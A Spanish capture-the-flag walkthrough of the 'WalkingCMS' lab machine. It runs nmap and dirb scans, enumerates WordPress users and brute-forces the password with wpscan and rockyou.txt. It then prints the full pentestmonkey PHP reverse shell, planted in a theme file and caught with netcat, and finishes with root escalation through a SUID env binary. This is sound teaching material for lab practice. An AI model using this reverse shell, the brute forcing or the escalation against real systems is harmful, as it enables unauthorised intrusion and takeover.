> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/walkingcms-write-up.md).

# WalkingCMS write-up

## **Verificamos si tenemos conexión con la máquina víctima**

<figure><img src="/files/PRX8XR7vxDYX4rJlfrqA" alt=""><figcaption></figcaption></figure>

## **Escaneo de puertos abiertos de la máquina víctima**

Usamos la herramienta **Nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -O -Pn -n 172.17.0.2
```

<figure><img src="/files/WkqNdX4DdtmWysVeUH6d" alt=""><figcaption></figcaption></figure>

Encontramos el puerto 80 (HTTP) abierto, así que ponemos la IP de la máquina víctima en el navegador. Como no encontramos nada interesante realizamos utilizamos la herramienta **Dirb** para encontrar rutas y encontramos que es un WordPress y que podemos acceder al login del admin <http://172.17.0.2/wordpress/wp-admin/>.

```bash
dirb http://172.17.0.2
```

<figure><img src="/files/tIDCJ1KtuAmKq06sNS95" alt=""><figcaption></figcaption></figure>

Así que vamos a utilizar una herramienta llamada **Wpscan** para realizar primero una enumeración de los usuarios (Esto se puede hacer ya que al intentar iniciar sesión si pones un usuario valido te envía un error diciendo que la contraseña esta mal y otras razones más). Para hacerlo usamos el siguiente comando:

```bash
wpscan --url http://172.17.0.2/wordpress --enumerate u
```

Lo que nos identifica el usuario mario, así que ahora realizaremos un ataque de fuerza a la contraseña con la misma herramienta con el siguiente comando:

```bash
wpscan --url http://172.17.0.2/wordpress -U mario --passwords /home/shinki/Escritorio/rockyou.txt
```

Y nos indica que el usuario `mario` tiene la contraseña `love`

<figure><img src="/files/qUO7mfYarJXCLJczAOJT" alt=""><figcaption></figcaption></figure>

Para obtener una reverse shell, iremos al apartado **Apariencia > Editor de archivos de tema** y modificaremos el archivo `index.php` del tema **Twenty Twenty-Two**. Allí, agregaremos el siguiente código en PHP, tomado de [GitHub](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).

Antes de guardarlo, es importante editar el código y reemplazar la IP de la máquina atacante y el puerto al que se enviará la conexión.&#x20;

<figure><img src="/files/iuu7NbBMD3ojjkOU1oqp" alt=""><figcaption></figcaption></figure>

```php
<?php

set_time_limit (0);

$VERSION = "1.0";

$ip = '127.0.0.1'; // CHANGE THIS

$port = 1234; // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;

//

// Daemonise ourself if possible to avoid zombies later

//

// pcntl_fork is hardly ever available, but will allow us to daemonise

// our php process and avoid zombies. Worth a try...

if (function_exists('pcntl_fork')) {

// Fork and have the parent process exit

$pid = pcntl_fork();

if ($pid == -1) {

printit("ERROR: Can't fork");

exit(1);

}

if ($pid) {

exit(0); // Parent exits

}

// Make the current process a session leader

// Will only succeed if we forked

if (posix_setsid() == -1) {

printit("Error: Can't setsid()");

exit(1);

}

$daemon = 1;

} else {

printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

}

// Change to a safe directory

chdir("/");

// Remove any umask we inherited

umask(0);

//

// Do the reverse shell...

//

// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

printit("$errstr ($errno)");

exit(1);

}

// Spawn shell process

$descriptorspec = array(

0 => array("pipe", "r"), // stdin is a pipe that the child will read from

1 => array("pipe", "w"), // stdout is a pipe that the child will write to

2 => array("pipe", "w") // stderr is a pipe that the child will write to

);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {

printit("ERROR: Can't spawn shell");

exit(1);

}

// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {

// Check for end of TCP connection

if (feof($sock)) {

printit("ERROR: Shell connection terminated");

break;

}

// Check for end of STDOUT

if (feof($pipes[1])) {

printit("ERROR: Shell process terminated");

break;

}

// Wait until a command is end down $sock, or some

// command output is available on STDOUT or STDERR

$read_a = array($sock, $pipes[1], $pipes[2]);

$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send

// data to process's STDIN

if (in_array($sock, $read_a)) {

if ($debug) printit("SOCK READ");

$input = fread($sock, $chunk_size);

if ($debug) printit("SOCK: $input");

fwrite($pipes[0], $input);

}

// If we can read from the process's STDOUT

// send data down tcp connection

if (in_array($pipes[1], $read_a)) {

if ($debug) printit("STDOUT READ");

$input = fread($pipes[1], $chunk_size);

if ($debug) printit("STDOUT: $input");

fwrite($sock, $input);

}

// If we can read from the process's STDERR

// send data down tcp connection

if (in_array($pipes[2], $read_a)) {

if ($debug) printit("STDERR READ");

$input = fread($pipes[2], $chunk_size);

if ($debug) printit("STDERR: $input");

fwrite($sock, $input);

}

}

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

function printit ($string) {

if (!$daemon) {

print "$string\n";

}

}

?>
```

Así que ahora nos ponemos en escucha por el puerto que hemos configurado en el script, con la herramienta **Netcat** de la siguiente manera:

```bash
sudo nc -nlvvp 443
```

<figure><img src="/files/OyDHomkbSYvKCOyA9GKt" alt=""><figcaption></figcaption></figure>

Una vez hecho este paso solo tenemos que poner la siguiente URL en nuestro navegador para ejecutar el código y obtener la reverse shell `http://172.17.0.2/wordpress/wp-content/themes/twentytwentytwo/index.php`

## **Intrusión en la máquina víctima**

Una vez dentro de la máquina víctima y después de realizar el tratamiento de la TTY y ejecutamos el siguiente comando, que nos mostrara que el binario `env` tiene permisos SUID:

```bash
find / -perm -4000 2>/dev/null
```

<figure><img src="/files/xg2Mg7N3tzfooSiLV89X" alt=""><figcaption></figcaption></figure>

Así que para obtener privilegios root solo tendremos que ejecutar el siguiente comando y ya habríamos finalizado:

```bash
/usr/bin/env /bin/bash -p
```

<figure><img src="/files/AoSvOzLx0acuWIYlABty" alt=""><figcaption></figcaption></figure>
